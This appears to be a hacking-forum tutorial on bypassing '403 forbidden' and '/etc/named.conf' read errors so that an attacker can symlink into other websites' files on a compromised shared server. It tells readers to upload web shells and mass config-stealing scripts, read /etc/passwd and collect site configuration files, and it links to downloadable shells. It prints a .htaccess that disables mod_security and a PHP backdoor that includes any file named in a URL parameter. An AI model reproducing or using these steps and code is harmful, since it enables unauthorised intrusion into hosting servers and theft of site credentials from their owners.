• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

403 forbidden and cant read /etc/named.conf error bypass

Admin

Staff member
Administrator
Now days most of the 2012 Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink .

1625s9e.jpg

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this .

I will be posting the download link of some shells i will be using in this tutorial

Best Script which can bypass cant read /ect/named.conf are :

1. Config ****er By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage : Config ****er , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there

Note : Its better to create a php.ini file before you do this for 100 % Result

All 4 shells i have mentioned i will post the download link

And i will be using a another private shell for this which i wont be giving you all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell .

So now if we cant to symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option -

jktva0.jpg

So now that we can easily Symlink to /Public_html/ path of each website

Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this ****

For 403 Forbidden Error i will be Using the Following Shells :

1. Dhanush Shell Coded By Arjun . ( This shell automitically creates .htaccess , php.ini and ini.php files after you login )
2. Mannu Shell by Team Indishell Private ! .
3. Symlink_sa 3.0 Script

I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code :

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden Error :

29w4dv5.jpg

2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .

15zhwdh.jpg

3.) Mannu shell to Check if we Bypassed 403 Error :

elke9.jpg

4.) Bypassed 403 Forbidden and Access to Public_html/ Path

120qy4l.jpg

Bypassed can't read /ect/named.conf and 403 forbidden Error

Here Download Link of all shell and script i used :

http://www.mediafire.com/?4bnp4xwyou7iyeb

Greetz : CyberAce Legion Who made me make this Tut and Team Indishell and all Indian Hackers .

Last edited:
Gì đây admin.shell à

Facebook Comments

Back